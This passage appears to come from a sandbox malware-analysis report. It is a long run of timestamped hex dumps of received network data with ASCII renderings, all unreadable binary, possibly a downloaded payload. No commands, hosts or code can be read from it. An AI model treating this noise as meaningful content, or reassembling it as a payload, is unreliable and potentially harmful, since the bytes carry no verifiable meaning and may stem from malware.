80 4a 91 54 45 52 27 ca 09 b5 ae a8 90 45 3e 88 0d 4e a9 9c 8e 45 e6 05 3c a3 14 f0 37 f7 db ff 97 ee 3c cc 8d 9d 07 56 bb 20 9c 10 c9 d9 50 31 1b 0c 41 92 43 28 df 00 41 2b c3
                                                                                                                                  Data Ascii: GN!`ek`_qVUvP#"#>kg9X/jvTBZ9'nyV#`e?FQ%Y`*%/X(-wqC2z7$5 heH.{U\U0i.THJTER'E>NE<7<V P1AC(A+
                                                                                                                                  2022-05-12 17:41:27 UTC185INData Raw: 06 97 1a fe c6 66 07 fb 4e 8c 01 56 4f 66 b4 9e ec fe 3c 40 5d bb d7 e4 7a ad 56 3c df f9 f1 db 2f 94 7e 25 c1 70 58 b5 3b 37 54 a4 46 54 f2 1f c9 f6 53 f9 2e f5 de d3 af e6 9a d0 24 3d 07 39 08 e1 10 a6 f0 f7 57 63 44 11 fb 51 4d c2 83 7b 94 34 df a6 67 34 5a 48 14 0a a9 76 c2 bb f1 a9 70 6e e9 25 02 68 dc f8 6f 0b 69 19 62 22 3e 0f 3d 65 a9 42 57 6e db f5 bd 57 0c 34 b8 6c 36 69 60 43 bf eb 52 1a 6c dc 56 c9 8a 3e cf 41 e5 a2 a1 e2 09 ce 14 ae 4f 8f b7 ff 9a 19 29 dc 38 89 3e 12 4b b4 7d 23 6a 49 25 7e 20 44 63 79 e0 c9 9c 76 37 3e d5 6b 60 2c b7 30 e8 c3 19 22 fa 74 d3 24 cf 21 d7 7d bc 4f 31 e2 62 20 de b6 e6 8a 4f e2 c8 8e 5f 2f 52 0f 4c 01 51 df a9 7f e6 a3 2a 2b c8 80 c2 b2 7b 3e 34 0b 10 d9 1e 96 c0 05 ca d5 e4 b3 34 4c 7a 50 19 03 5c c8 bd 4a 90
                                                                                                                                  Data Ascii: fNVOf<@]zV</~%pX;7TFTS.$=9WcDQM{4g4ZHvpn%hoib">=eBWnW4l6i`CRlV>AO)8>K}#jI%~ Dcyv7>k`,0"t$!}O1b O_/RLQ*+{>44LzP\J
                                                                                                                                  2022-05-12 17:41:27 UTC186INData Raw: df fc 52 41 42 78 43 e2 c9 a8 80 31 d0 63 e2 aa 3c 90 31 d6 30 92 3e 4c 28 8c 87 28 55 d6 84 78 70 85 e2 d2 49 d1 03 b3 36 66 94 05 66 27 eb fd 31 d1 60 c4 6c 76 2f 83 4d 91 32 e6 1f 44 81 b0 a7 34 e8 6e 07 15 25 b6 db 74 51 f5 b7 b4 57 41 29 ad 29 fb 63 8f d8 fa b1 55 00 4b c7 5b 66 c7 ee b8 c0 88 9b fc 27 ce 4f c5 9a fd 2b f7 dc 59 a0 b2 ae d3 7b 09 4e 4f 86 20 b8 c5 99 45 b5 b7 64 04 c9 a4 41 fc b8 26 b7 21 7f e8 4c 45 8d 00 f8 0b 69 81 af c9 da 73 c8 b1 6e 53 e5 a0 9e 2f 62 a0 71 26 72 27 6c 2c ba 41 f6 90 f8 c1 fc 88 7d d7 90 d2 46 00 a3 be 5f 5b da 14 81 6e e2 1b 48 f0 2a b8 73 13 97 97 b3 dd ec d6 37 2c 87 d3 5c 3f 45 09 39 f6 41 0d 4d 8a 37 4e a6 fb 80 17 34 78 60 17 21 d1 02 3c 46 d4 69 8f 57 e2 6b 6c 07 a8 a0 fc 93 f1 49 60 bd f5 99 1a a5 4f d7
                                                                                                                                  Data Ascii: RABxC1c<10>L((UxpI6ff'1`lv/M2D4n%tQWA))cUK[f'O+Y{NO EdA&!LEisnS/bq&r'l,A}F_[nH*s7,\?E9AM7N4x`!<FiWklI`O
                                                                                                                                  2022-05-12 17:41:27 UTC188INData Raw: 12 86 ed 64 73 b6 31 09 89 3c fd 7e a3 89 96 20 c9 d1 7f f7 92 84 a1 df 8b b6 ef dd 2c 1c b5 3e d8 8f 03 3d 55 6a 32 64 f5 09 25 1f db dd 8d 64 13 58 25 ba 94 bc 05 c6 a1 92 ef ac c6 f0 9e cc f8 ed 15 a0 c1 74 59 fa 57 bd b7 fa 80 05 bd 5c be fd 9a 2f 0b 8b fe 4b 14 bc e0 b8 d9 ea c7 67 21 05 16 4d 94 bc 8e 6d 18 64 70 d1 3e cc 41 9b ff 85 e8 a3 88 1a 2c e2 cf fe e9 26 23 ec ba 6e cb 8a 26 33 a5 35 26 aa 3f 4d 2d 6a 88 e3 a8 60 d8 db 27 5c 6d 0e 75 a5 37 81 11 6e e9 cb 8b 29 79 b8 96 29 ef 11 6e ec 03 94 56 fb 64 b5 b8 3a 7a 95 58 f8 04 dc 03 f5 85 2b 05 5b d4 fe c9 53 9a 56 b3 7c 7c c9 0d b1 e8 a2 e7 d4 98 aa 75 7c 6d 82 e1 aa c9 c9 79 36 23 e2 e6 e5 c9 c9 7b bb ff fd 52 a4 44 5c 82 b6 38 d8 c0 0f a9 8f d9 7a 02 18 d5 e1 53 87 1b 0d c8 4a 23 7e 41 72 8e
                                                                                                                                  Data Ascii: ds1<~ ,>=Uj2d%dX%tYW\/Kg!Mmdp>A,&#n&35&?M-j`'\mu7n)y)nVd:zX+[SV||u|my6#{RD\8zSJ#~Ar
                                                                                                                                  2022-05-12 17:41:27 UTC189INData Raw: 41 79 de ef 2b 66 5c a4 b6 5f a6 5a eb af 7e e5 1f 09 f9 b9 b1 e5 05 91 5e f4 d4 69 db 4c 76 83 db 1f 2e c0 f6 f0 d3 45 19 0c 86 ae 47 7e ce 86 a7 79 71 eb 0a 95 ef 16 34 05 f5 e6 99 81 c6 6f 48 46 b5 3f f5 8a f0 4f cb f0 fc 08 37 ac 47 c3 af 43 ba e8 ec fd d3 6b 52 7c 6e cf eb 26 25 e6 b2 ce 03 12 7c ef ff e5 ea 4a 31 b3 83 c8 50 e9 c6 b3 06 eb dd 1e 46 cc 65 06 88 d3 a6 8e b9 aa 7f 69 a0 52 da 04 20 65 ee 33 0d 2e 21 d3 90 00 db 16 b6 c7 37 06 69 66 32 19 d7 a2 0c 93 6c f5 32 34 96 7d a8 d7 30 7a 7b 76 e9 c7 35 fb 0a 11 0c 7d f1 c1 bc 5b 70 23 e3 54 68 47 95 ea cb c9 3a 53 26 6a 9d de 4a a5 57 88 01 24 65 1e 50 13 78 16 c0 e9 98 4d 6a 03 fd ee a7 4a 26 81 ad b4 27 df 8f 62 e2 7a f7 14 ee a3 a7 4d cb e4 90 74 41 ea 51 07 8c dc 52 43 8b 64 fd 62 2d 2c 17
                                                                                                                                  Data Ascii: Ay+f\_Z~^iLv.EG~yq4oHF?O7GCkR|n&%|J1PFeiR e3.!7if2l24}0z{v5}[p#ThG:S&jJW$ePxMjJ&'bzMtAQRCdb-,
                                                                                                                                  2022-05-12 17:41:27 UTC190INData Raw: ba 00 46 41 43 5e 22 7f ac 9f 53 5c 67 a9 62 d3 e6 c4 58 eb b3 67 25 52 74 b6 12 fc b3 c0 fe 2e a4 71 01 b9 ad b3 71 10 73 7b ff 8a 26 b6 63 2c fe e0 b0 09 c0 39 91 9d 60 63 1d bb be b6 aa bd 1a 44 d5 f5 38 37 65 79 4b e9 25 47 18 24 47 af a3 6f 66 a6 6c ae b5 c9 29 d9 a4 6c 61 3e 7c ca 45 1d ff bb a1 e8 76 16 7f b2 35 6b 8f d2 5b 8d 0d 63 cb 74 38 eb 43 b7 68 ad 77 5e ab c3 ab e3 da 87 00 bc ef 1b 76 45 d2 be ef ba 2a b6 01 bb 73 56 2c 04 b9 25 6d cd c7 c6 f4 92 ed e6 e1 7b 44 75 43 38 df 79 94 6e 02 83 67 12 0a cc e8 78 ec a5 32 2b 4a 0b d8 71 82 f0 a3 6e 4a ac 15 57 70 68 ad 2b 9f 6d 74 5f da 7a 0b 5b f2 8e fb ef c5 ae 19 13 50 6d 43 93 0a 5d 9c ff 4d 35 8b 3d c6 61 06 07 01 cc 97 f9 54 67 0e d7 32 2e c2 88 dd b4 de e3 9e 69 eb 2b bb d2 ed 59 f1 a1 08
                                                                                                                                  Data Ascii: FAC^"S\gbXg%Rt.qqs{&c,9`cD87eyK%G$Gofl)la>|Ev5k[ct8Chw^vE*sV,%m{DuC8yngx2+JqnJWph+mt_z[PmC]M5=aTg2.i+Y
                                                                                                                                  2022-05-12 17:41:27 UTC192INData Raw: 5b 25 3a 94 af d9 2b 19 40 e3 19 01 24 e7 85 b8 a6 5c 26 08 79 d0 ad 3f c4 3b c8 60 57 0c 7d 50 40 1d 78 a4 a8 eb 35 04 26 e5 bc c2 29 43 ea db d1 66 ac f6 0c 81 7a a0 7a 8a f9 d5 aa bb e4 d1 07 22 e8 13 63 8c 9f 36 43 cf 00 fd 27 49 26 51 4d 5c ea e4 46 af bd cc de e4 58 5b f5 31 32 c8 05 1a e9 bb 38 a8 23 80 06 c8 f8 92 a6 5a ae 41 c8 d7 7d 3b 7c 26 2b 10 e1 03 e6 00 5a 1d 79 57 56 25 09 54 3e f6 7a 47 54 7a 62 86 1a 59 85 1e ea 89 59 1a b5 59 71 c9 de 90 8e af 56 fe e6 a6 b1 72 9f fb af ac ec ce 63 d3 32 40 b1 d9 8a b0 36 0e 9a 31 15 52 36 9a 29 47 3a b4 de e2 81 78 6e 35 b6 e1 b7 4a 1f d0 47 8b 5d b9 62 e7 b2 80 af 60 e3 a3 44 3c 24 0a 52 d5 2b dc d3 c8 db c9 69 ee 6a 19 80 89 98 59 2b 9c f9 a8 b3 b1 47 32 3c 60 91 d8 1d e4 4d 69 90 30 68 4b 79 26 1e
                                                                                                                                  Data Ascii: [%:+@$\&y?;`W}P@x5&)Cfzz"c6C'I&QM\FX[128#ZA};|&+ZyWV%T>zGTzbYYYqVrc2@61R6)G:xn5JG]b`D<$R+ijY+G2<`Mi0hKy&
                                                                                                                                  2022-05-12 17:41:27 UTC193INData Raw: 36 ec 8f 57 49 6a 6e cf 69 c4 e1 88 02 61 8a 78 54 37 0f af 18 c0 7a 4f 3a eb 7c 6a 72 df 8e d9 c2 b1 b7 12 7c 7a 55 36 af 27 2f b3 d6 20 32 c3 5a c0 5d 59 33 3b a3 91 d4 27 72 08 b6 38 03 c2 88 dd b4 de cb 82 49 ee 3a af ee a3 4b f9 b0 57 e7 c6 db 68 1e 6f 2d 3e f4 3b d4 b4 db 29 fa ad 19 68 c9 fb 25 e5 f5 41 c5 5d 1d 4e 3a 30 f4 12 98 c6 02 86 fc d0 a8 a4 a3 d5 40 85 81 1d b4 6b 0b 51 15 8d 3a 5c 03 e1 fd 98 94 fd ac 5c 90 24 79 8b ff 6c 2e 28 c6 e2 36 ca be ea ca 07 96 7a 1e 91 57 d5 73 5c f0 2a fb b4 9f ae 62 1a ee af 39 7b 2e 9a 53 fe 12 7c 3b cb 46 35 d2 b4 f0 ce 4e 15 34 62 4e a6 12 67 23 80 28 ea 22 8b 1f 21 6a da e4 9d fe bc 4b 8c d6 89 d5 57 d4 1a 86 cc 20 de 98 9d f5 b0 0c 37 38 3c 4d 9c d8 6f 9f c6 cf 61 98 1a f0 a0 bb 83 63 55 58 cf c8 1e e3
                                                                                                                                  Data Ascii: 6WIjniaxT7zO:|jr|zU6'/ 2Z]Y3;'r8I:KWho->;)h%A]N:0@kQ:\\$yl.(6zWs\*b9{.S|;F5N4bNg#("!jKW 78<MoacUX
                                                                                                                                  2022-05-12 17:41:27 UTC194INData Raw: c3 f9 47 73 1a a4 61 4c 9e ba 4e ad 6c 45 cc 00 0f df 2a 91 5b d9 57 18 e8 ea 80 93 f4 ad 65 86 ee 7e 79 66 a0 bd dd df 2d b1 75 ab 47 3f 2b 37 cd 26 2b 8a d5 e9 90 91 de 92 d0 55 26 44 70 5d 9a 76 f1 44 35 c8 45 2c 7d eb dd 1c cc 96 46 3b 64 69 ce 42 e7 94 a3 0b 41 8e 67 50 43 0d ae 2f f0 4b 59 1e ed 46 79 76 d8 fb ca c2 c5 ad 35 7a 63 4a 31 99 30 32 8a c4 2c 35 af 58 e4 5d 72 11 20 ae 87 c5 31 01 05 b8 38 30 ab 9c d1 a2 ed fe b1 52 fe 3d a5 f8 98 5e f1 d5 11 c9 cf ca 79 18 74 3c 32 e5 3d c5 a2 99 03 c0 ad 1a 69 a8 ce 24 dc de 4c c2 54 1b 7b 21 36 ff 35 9b de 13 e3 af e1 b2 b4 a3 f5 01 af 91 05 ff 68 03 51 15 cc 08 5a 1e e5 d9 84 8c fd f8 71 98 27 18 aa fc 5e 11 25 cf c3 3a e6 af 9e fc 0f 80 6a 3e 9d 3a f4 16 79 e0 39 d0 b0 9e 92 5c 0c e3 be 32 6e 33 83
                                                                                                                                  Data Ascii: GsaLNlE*[We~yf-uG?+7&+U&Dp]vD5E,}F;diBAgPC/KYFyv5zcJ102,5X]r 180R=^yt<2=i$LT{!65hQZq'^%:j>:y9\2n3
                                                                                                                                  2022-05-12 17:41:27 UTC195INData Raw: 09 9b 25 93 26 c8 8a 90 a2 4a a1 7f c2 da 7f 3c 67 6f 1c 75 d2 2a f7 3e 4f 06 72 32 42 33 3f 72 34 fd 14 7c 41 71 78 98 1a 56 86 6a d6 e1 58 1a a0 62 32 ea df 85 8f c1 40 d6 83 ab b2 06 b6 9f 8c c9 cb d1 4b 8c 1b 4e a8 ec 88 ad 26 42 ad 36 18 48 3a fb 09 45 13 a6 e7 ea 92 75 0a 66 a5 e5 b1 61 20 e6 5d 8b 78 d6 61 eb a0 b6 87 6b 8d a4 49 48 39 2f 33 e5 36 91 f8 c5 b2 ea 69 8b 48 70 f3 ab 85 06 26 9b 98 ab b6 d4 41 5b 5b 66 8c 87 3b f4 39 69 8a 64 7c 43 17 32 11 eb df 89 a8 c9 e2 6a 50 a8 59 92 99 63 7b c6 4a 88 cd 59 7e f1 00 30 94 43 e1 7f c5 9e 46 d4 43 89 86 30 41 10 6e 2a 0b 20 18 6c 74 93 97 93 12 0b de ea 9c f7 9b 1c de 7c c4 4f c9 17 d3 e3 d1 63 46 2a 27 59 49 1a aa f4 35 59 0c ce 66 b8 a4 c8 33 a8 96 0c 61 74 1f f3 17 8f 8c ea 9d 2a 81 1d 25 9f cc
                                                                                                                                  Data Ascii: %&J<gou*>Or2B3?r4|AqxVjXb2@KN&B6H:Eufa ]xakIH9/36iHp&A[[f;9id|C2jPYc{JY~0CFC0An* lt|OcF*'YI5Yf3at*%
                                                                                                                                  2022-05-12 17:41:27 UTC196INData Raw: 40 f6 d4 5c e8 77 2d 6c 30 30 fe 35 96 c5 67 e1 ca dd 84 86 a3 ca 1d a2 8b 07 9a 55 07 48 2f db 19 5c 1f e5 d4 9f f8 ca 8c 59 ba 24 0d 89 f5 58 34 2d cc d8 5f e4 b4 84 f8 03 90 6c 23 97 54 b0 20 62 e6 2a d2 b8 c2 93 7a 46 c4 b4 31 5f 35 92 45 8d 28 76 21 87 40 23 d2 bc c3 d7 4a 1c 09 68 42 b7 7b 5b 28 f4 0c fd 33 b5 27 27 66 d5 c4 9d fc b7 4b 98 ca 8e ed 53 ca 27 a9 c9 2c c9 86 8f d5 b0 0e 3c 38 0b 4d 9b e0 67 82 d3 fa 6b 94 11 83 80 96 99 7a 55 35 ae e1 17 8c a4 1e 3c 80 a7 20 33 a1 8a 68 88 9a c8 fa dc d8 1e 0a d4 3b b5 6a 20 36 97 6d 52 4b 4c ff c2 65 bd 7a d3 a4 43 6f 06 08 32 48 a5 26 7a f6 1e 81 4b 78 f7 09 c9 94 5f 16 17 13 8a b3 5c 9e 64 28 45 1c 9c a4 ea 38 1c 56 86 17 07 2b f9 8f a8 bd 53 3d 48 2f f4 bf 3e c6 3f c9 6e 48 09 7b 33 67 11 79 ae e9
                                                                                                                                  Data Ascii: @\w-l005gUH/\Y$X4-_l#T b*zF1_5E(v!@#JhB{[(3''fKS',<8MgkzU5< 3h;j 6mRKLezCo2H&zKx_\d(E8V+S=H/>?nH{3gy
                                                                                                                                  2022-05-12 17:41:27 UTC197INData Raw: d6 3a 42 b8 5f 88 5f ca ec 03 fc 00 bd 95 40 72 39 02 0d 12 45 38 6a 13 9e 8f fa 05 09 b3 de 84 98 88 1f ba 7f dc 4f ec 3e a1 d8 ca 17 4a 31 42 73 63 76 88 f0 47 76 13 a6 4c 83 d6 ef 2e c1 93 02 13 16 3d b5 39 8e 98 e5 8a 39 92 1e 3f 94 c9 b1 66 64 7f 49 e2 91 25 b0 55 10 d3 8c b5 28 b2 5b 86 ed 66 44 74 be 96 f0 a0 95 7e 47 e3 f5 18 16 11 7f 6b 8a 09 66 7d 12 02 ea 88 49 09 84 4c dc f2 df 4c e5 a3 19 66 1d 19 da 00 4e f9 8c d7 e5 50 73 4a 98 5c 63 be 9f 5d a6 6c 46 e8 06 7b f9 2c ba 40 d9 57 7f ce f7 ed ae fc af 61 93 cc 76 72 6d a6 93 cb d0 2c 93 75 8c 50 37 3b 21 d1 26 59 cd f3 e5 97 a5 d8 8f d6 45 0d 55 61 56 ee 57 f2 41 20 f1 20 10 66 e5 df 0b e8 86 77 3f 68 65 cf 7e e3 fa 80 02 4a 99 15 62 4e 1b be 09 f2 01 7f 30 fd 57 4f 70 d7 a0 fd c8 a8 98 38 7f
                                                                                                                                  Data Ascii: :B__@r9E8jO>J1BscvGvL.=99?fdI%U([fDt~Gkf}ILLfNPsJ\c]lF{,@Wavrm,uP7;!&YEUaVWA fw?he~JbN0WOp8
                                                                                                                                  2022-05-12 17:41:27 UTC199INData Raw: a9 04 73 0a 8d 75 43 5a 60 a2 e9 6e b8 53 c0 a2 59 72 28 14 55 6b d7 0c 66 f2 1c 86 57 58 d3 0b cd b9 44 3b 09 11 9a c7 52 94 7e 77 5f 14 92 aa cf 59 39 60 91 31 0c 22 fb 9e a2 a8 56 21 26 48 dc aa 15 e6 25 ef 65 41 0b 6a 39 72 14 65 c0 9a fd 38 35 06 97 8b c3 2f 48 f7 c4 d5 4b ac 8f 05 87 0e a8 50 8b cf c6 b0 b4 90 d3 06 24 8c 34 69 f8 b5 33 2f f8 64 8e 07 59 79 42 5a 39 e9 e5 20 86 ac a0 cd c2 5e 61 d8 30 5c fb 09 0f d2 a1 56 89 3d 82 33 cc f9 f7 92 4a 97 5f d4 b4 5b 3a 6a 0e 3b 75 f6 07 e0 31 45 01 1a 64 44 23 27 59 32 fc 0f 65 41 6d 6d a0 1a 71 95 7b d3 92 2b 2c ad 4e 05 e0 dc df bd c6 5a fe 89 b2 a6 5c 98 f0 b9 c1 cc 86 66 8c 0c 21 9c d7 83 a1 33 67 a6 2b 7f 7f 3d 95 3a 4e 05 a6 d9 ec 88 6e 0a 66 a8 f7 b7 70 3e 9f 60 9a 68 a2 28 dc b1 8e bf 68 82 a2
                                                                                                                                  Data Ascii: suCZ`nSYr(UkfWXD;R~w_Y9`1"V!&H%eAj9re85/HKP$4i3/dYyBZ9 ^a0\V=3J_[:j;u1EdD#'Y2eAmmq{+,NZ\f!3g+=:Nnfp>`h(h
                                                                                                                                  2022-05-12 17:41:27 UTC200INData Raw: dd 4b 76 71 b7 b2 dd ba 2e 95 75 80 76 23 3b 30 dc 2d 5f cd e9 d0 b1 be ce b6 cd 55 2a 45 04 5f ff 4a cb 64 2a e0 41 39 4f ea cb 28 e2 8b 5c 3d 0d 6c de 42 dd d7 8b 1b 41 9f 15 56 52 1c 95 38 f6 4c 57 1c f6 47 65 6b ba c9 db d3 86 80 30 61 54 4a 36 b5 36 5d b8 d9 29 16 a0 5e c0 59 72 63 0b a9 95 d8 3a 40 25 b4 30 16 b6 ef fa 83 f3 e2 80 52 ce 2a af e8 94 5a e0 d5 15 e3 d1 d6 48 18 45 20 38 f5 31 c1 b3 99 04 dc be 11 6c ad ef 34 f0 c3 5c b7 7b 11 54 23 27 ff 28 f9 cc 02 f2 f0 f9 b4 a2 b2 b8 1d ae 90 36 ca 49 10 48 70 ea 19 5a 33 c5 d5 85 9d ea 96 54 91 12 1c ad e6 4f 35 14 cc c4 2b a7 a8 8f fa 39 ab 71 3e 9d 48 de 12 77 c6 3b c5 a3 89 a8 65 07 f5 af 5c 7c 28 85 42 fe 07 6d 3f d0 42 24 f4 86 f3 d2 5f 03 14 0b 6b b7 66 44 11 91 09 ca 22 9b 1e 2d 76 c0 b0 ac
                                                                                                                                  Data Ascii: Kvq.uv#;0-_U*E_Jd*A9O(\=lBAVR8LWGek0aTJ66])^Yrc:@%0R*ZHE 81l4\{T#'(6IHpZ3TO5+9q>Hw;e\|(Bm?B$_kfD"-v
                                                                                                                                  2022-05-12 17:41:27 UTC201INData Raw: 77 db 09 46 51 73 60 9b 0d 7d 8c 6e ca 98 2b 3d 97 4f 08 f5 c5 b6 8f db 64 e8 89 b5 b0 00 aa e6 cb ee fc f4 5b 92 0b 72 ba cc bd a7 3d 7e ad 2a 0b 45 52 88 29 5f 28 85 c2 ec 9e 64 0a 7c 86 e1 a1 45 21 de 4c 86 10 95 6a e7 a4 8b a5 65 91 b4 71 3a 14 3e 4a a6 19 f8 d0 c9 e1 d6 73 ff 6b 74 a3 9e 83 7e 17 f2 df af ab 84 51 5d 23 7c e5 d5 3a fa 50 7f 97 16 63 7a 65 3a 00 92 8f bf a0 9d ce 43 24 9e 4a fc bb 4c 15 e9 30 dd f8 4a 7e d2 10 30 b5 53 e1 58 d5 9e 67 c4 43 aa 96 30 60 00 6e 05 1b 20 45 56 06 98 8b f2 05 04 97 e3 86 9b 9b 1b bb 74 da 2e da 14 bc cf fe 06 71 20 4e 71 51 24 94 ab 03 59 53 8b 62 ea 94 ad 19 9d c4 25 4c 22 40 b0 14 d1 cc c5 c7 50 cd 35 0b c5 9f 90 50 54 1e 04 d3 bb 72 aa 17 67 5c 98 fd 0a c3 3a 91 31 99 e8 64 99 32 04 47 f9 12 95 eb a9 09
                                                                                                                                  Data Ascii: wFQs`}n+=Od[r=~*ER)_(d|E!Ljeq:>Jskt~Q]#|:Pcze:C$JL0J~0SXgC0`n EVt.q NqQ$YSb%L"@P5PTrg\:1d2G
                                                                                                                                  2022-05-12 17:41:27 UTC202INData Raw: 7c 2e 7e 0d b2 f7 d8 99 f9 27 7c 48 7d ff 91 2b 4f 40 83 b7 5e ad de ca 8e 74 62 f2 4d d8 39 b1 6e 1e 9d 56 b2 f5 ec c8 b5 9d 81 fb 5d 2e 55 77 db f8 61 18 4e 96 a6 57 a3 e3 80 a6 32 7e 41 0c 28 d1 93 21 54 75 72 8a c6 f7 79 c9 24 a6 31 e9 81 58 6e d9 32 d4 84 33 b5 ee 02 bd 36 aa 6b 2f a7 f9 60 53 2a ee 05 e1 b4 0c ed a0 0f 1f e9 fe 9e da cf e8 0f 22 d8 6d b4 fa ca c3 5f 50 fb 5c 70 42 e8 e5 14 09 e6 ae 9b ab 2b 46 68 b2 d3 ff 0c 00 66 ef 0c a6 c3 2f df 96 20 da 17 a4 46 16 0f 69 62 33 16 d9 5b 8a 56 64 f1 32 3c 96 7d ba d0 39 66 69 f7 d4 db 27 84 16 35 17 60 ed dc be 44 6c 33 e3 53 74 5b 87 df c5 d4 26 4f 28 32 ab eb 57 a7 53 8a 00 2e 79 0f 50 1b 64 0a d2 dc 96 51 76 58 eb f3 b5 7f 3b 81 af a4 27 d7 8e 7e f0 4f f9 09 f2 b4 a9 d8 ca d1 92 76 4b ef 52 15
                                                                                                                                  Data Ascii: |.~'|H}+O@^tbM9nV].UwaNW2~A(!Tury$1Xn236k/`S*"m_P\pB+Fhf/ Fib3[Vd2<}9fi'5`Dl3St[&O(2WS.yPdQvX;'~OvKR
                                                                                                                                  2022-05-12 17:41:27 UTC204INData Raw: e5 cb 73 de 18 ac 57 b6 79 d3 a0 b2 7b 03 61 24 15 2a 02 f7 98 32 1b 6f d6 2f c1 d1 85 58 a8 e5 e7 fc 14 72 fa 55 fa e4 cc fc 6f f9 75 59 fd ad d4 10 44 2c 3d 90 fc cb d7 17 65 b6 c0 d2 5f 42 1a c4 1f 2a 35 9f 9a e6 b0 ef f8 1b 30 13 b4 59 53 64 3a 1f 6b 4f 0e 38 65 10 2d a7 22 7e f8 3b 2c b7 90 2f b1 e0 64 12 f9 3d ab 06 0f c0 f2 a0 8c 34 6e 74 b8 54 69 bd 9a 3c c8 08 26 8f 66 27 a5 47 f3 2e bf 6e 1d ab 84 ec f1 c1 c7 07 f7 a7 06 19 0b d7 fc a9 a8 cb b9 05 d7 35 44 15 41 bf 51 4b c9 a0 81 ec c8 ad e6 a6 36 5c 39 1c 20 9f 1e 95 29 57 e3 26 75 0b 85 bd fa dc e4 35 4a 05 19 db 3e 85 b4 e5 6f 3f fa 97 64 3c 48 c9 7e 1d 6e 2e 03 8b b0 4e 03 bf ae bf a6 d7 b4 5a 14 11 38 46 c6 47 53 f5 aa 51 5f c6 3d a5 3b 84 3a 40 cc f1 bf 46 83 1b d9 48 7a c8 ef bb c5 8f 8a
                                                                                                                                  Data Ascii: sWy{a$*2o/XrUouYD,=e_B*50YSd:kO8e-"~;,/d=4ntTi<&f'G.n5DAQK6\9 )W&u5J>o?d<H~n.NZ8FGSQ_=;:@FHz
                                                                                                                                  2022-05-12 17:41:27 UTC205INData Raw: a0 df 36 7a 79 7c f4 c2 3d f7 0a 29 1a fd 30 cb b4 79 73 22 fe 51 60 55 e1 ee cc cb 30 5a 2e 28 bc d0 44 ad 4a 89 09 21 45 1c 5e 10 7b 13 e0 e8 96 51 69 4b e2 e4 a5 58 a4 3e a4 be 2d c3 88 68 e8 70 f4 34 ee a0 a4 e5 d8 e3 92 72 46 eb 57 16 fc de 52 43 89 6c fd 66 2b 37 97 e8 58 a5 80 46 e7 dd c8 b9 81 2c 01 bc 54 2f 8a 68 6d be d2 4e c4 4c f4 5a b8 98 77 2e 36 fb 33 a6 b6 05 4d 0a 6f 4d 19 af 6f 9b 50 2c 70 02 2f 2c 5f 5b 24 75 b8 72 09 2c 16 0c d0 76 20 f9 0c 3e 08 23 79 d4 3f 79 9d a1 f9 ee af 35 92 ee c8 d5 75 d6 96 c2 b1 ba 94 a2 0b 77 28 c7 b9 f8 da 52 08 c0 48 71 2c 5c eb 42 39 f7 3c b8 93 e8 1c 28 24 d1 8c cb 05 5d a1 3a f7 00 de 16 86 c4 e1 da 0a eb d7 21 4b 73 4e 23 a8 57 97 bc af ba a1 0e 81 0f 0f f2 ee ea 06 6f f0 88 db a3 d3 23 33 52 15 f4 07
                                                                                                                                  Data Ascii: 6zy|=)0ys"Q`U0Z.(DJ!E^{QiKX>-hp4rFWRClf+7XF,T/hmNLZw.63MoMoP,p/,_[$ur,v >#y?y5uw(RHq,\B9<($]:!KsN#Wo#3R
                                                                                                                                  2022-05-12 17:41:27 UTC206INData Raw: 57 2c 16 ed 57 02 ed 52 0a 85 b2 6a 0c 2f 3c 4d 0b 1a 3b f2 86 92 f5 ee e7 ef 13 20 b7 a4 ce 6a 8e af ec 5b 99 32 0b 9f be 8f be a7 45 ec 53 13 17 a5 47 d8 42 5d 7d b3 49 57 c3 bd a1 2c 06 63 c9 ed f5 ad 46 80 4e d9 5c 68 ca f2 bd c8 88 92 f9 2f 82 46 c2 92 e3 22 9d dc 5e ae ab a6 36 64 0e 40 53 81 48 b3 cf 84 55 bc dd 74 0e c8 a1 45 81 a4 3a 37 e5 7f 28 d4 4a 9c dc 05 8d 60 9e a7 a1 d3 d8 db bd 66 c3 f9 6c 94 2f 73 be e5 90 79 20 64 84 b3 ec fd 90 e5 30 e0 44 64 da 8d 2f 5a 41 be b3 5a a7 d9 e4 80 7a e5 0a 58 7a df b2 7d 15 93 7e b6 c6 ed c9 35 6c 87 da 54 22 4d f7 35 ff 53 9b 46 95 a5 4f ae ec 82 a3 27 75 7d 0e 36 d1 90 d1 44 fa 65 96 45 fe 08 48 77 b4 d5 f4 f7 d9 2e cb dd fd ed 36 ce 6e a6 af 2f bb f5 e9 af c4 64 40 ba 86 35 ed 86 8c 01 af 8b 1f fe 62
                                                                                                                                  Data Ascii: W,WRj/<M; j[2ESGB]}IW,cFN\h/F"^6d@SHUtE:7(J`fl/sy d0Dd/ZAZzXz}~5lT"M5SFO'u}6DeEHw.6n/d@5b
                                                                                                                                  2022-05-12 17:41:27 UTC208INData Raw: 5e a9 97 86 33 62 be 22 f7 b8 e7 d1 54 1f 48 a4 7b d3 51 fb 4c 2f 71 c4 31 83 e2 5d 0a 35 d1 80 c3 17 53 b1 30 ff 14 d6 06 8a d4 f9 ca 04 e7 df 21 48 7b 42 c3 a6 5f 91 b8 ac bd af 00 8f 0e e9 f3 ec ef 00 7d f3 9b cc cc d6 28 27 49 84 e9 84 4c 9d 2a 0d f0 66 13 0a 14 54 6b eb 9c fc c9 9f 84 3e 27 c8 b0 39 ec b6 d0 a7 4f dd bd 31 70 b1 70 37 dd 3c f3 b9 4a 9c 0d b0 4d c1 e2 2d 08 74 60 77 70 a3 40 04 7a ff f5 8e 7f 6a fe 8e e3 e5 7d 43 dc 09 ae 5c af 7a c6 b3 39 56 07 4f 29 16 02 1a fa 8e b6 26 65 dd 21 c0 a5 87 4d b9 74 5e 63 18 7a f4 51 fe e7 04 3b 7b 8c 6b 4e f7 a3 c1 06 e6 c9 3f 9e f6 45 d9 0a 6b b4 ee c4 5c 43 62 d7 93 0d 2f 00 d1 f3 b1 ca f7 14 2c 83 80 42 7d 63 3b 0d e8 68 0c 16 72 05 aa f3 38 e6 3d 28 a0 ef 82 3b 10 0c 7e 75 69 fd f9 06 3d 9d ec 20
                                                                                                                                  Data Ascii: ^3b"TH{QL/q1]5S0!H{B_}('IL*fTk>'9O1pp7<JM-t`wp@zj}C\z9VO)&e!Mt^czQ;{kN?Ek\Cb/,B}c;hr8=(;~ui=
